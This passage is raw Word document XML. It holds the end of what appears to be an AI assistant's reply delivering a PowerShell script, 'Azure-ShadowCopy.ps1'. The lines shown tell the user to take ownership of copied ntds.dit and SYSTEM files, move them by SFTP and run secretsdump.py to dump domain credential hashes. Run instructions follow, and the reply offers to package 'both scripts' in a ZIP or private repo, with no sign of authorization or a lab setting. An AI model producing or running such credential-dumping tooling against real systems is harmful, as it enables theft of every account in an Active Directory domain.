    <w:p w14:paraId="629DC3EC" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "  sudo chown azureuser:azureuser ~/ntds.dit ~/SYSTEM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59722FD7" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA235A8" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "Then SFTP and run secretsdump.py locally."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F12CBF" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r>
        <w:pict w14:anchorId="16376793">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E7680" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> To Run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D24E18B" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Install Azure PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> (if not already installed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED718E" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Install-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422A2954" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authenticate</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66806610" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Connect-AzAccount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D858E4" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execute</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> the script in a PowerShell session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D6FDF2" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>.\Azure-ShadowCopy.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8DB99" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r>
        <w:pict w14:anchorId="668D38D5">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="186D3648" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Would you like both scripts bundled into a ZIP file or uploaded to a private GitHub repo for easier access?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C81663" w14:textId="77777777" w:rsidR="00367855" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4524CD1D" w14:textId="77777777" w:rsidR="00367855" w:rsidRDefault="00367855"/>
    <w:sectPr w:rsidR="00367855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F6B75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66C89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F941AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4446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85A28"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="038C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BC2364"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA2090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8A63F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF74E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2707B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0636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327006">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="612590556">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1019697159">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="580943024">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="902058628">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1583099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55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6785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0F9A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1819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5D698"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7E30C5A3-50CB-480F-9909-34018F28F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A2F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20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2F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b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8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8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8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8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8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2F"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b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855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855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855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855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855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8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85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3678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855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367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855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367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1208</Words>
  <Characters>6891</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>57</Lines>
  <Paragraphs>16</Paragraphs>
  <ScaleCrop>false</ScaleCrop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2026-04-06T09:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T09:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>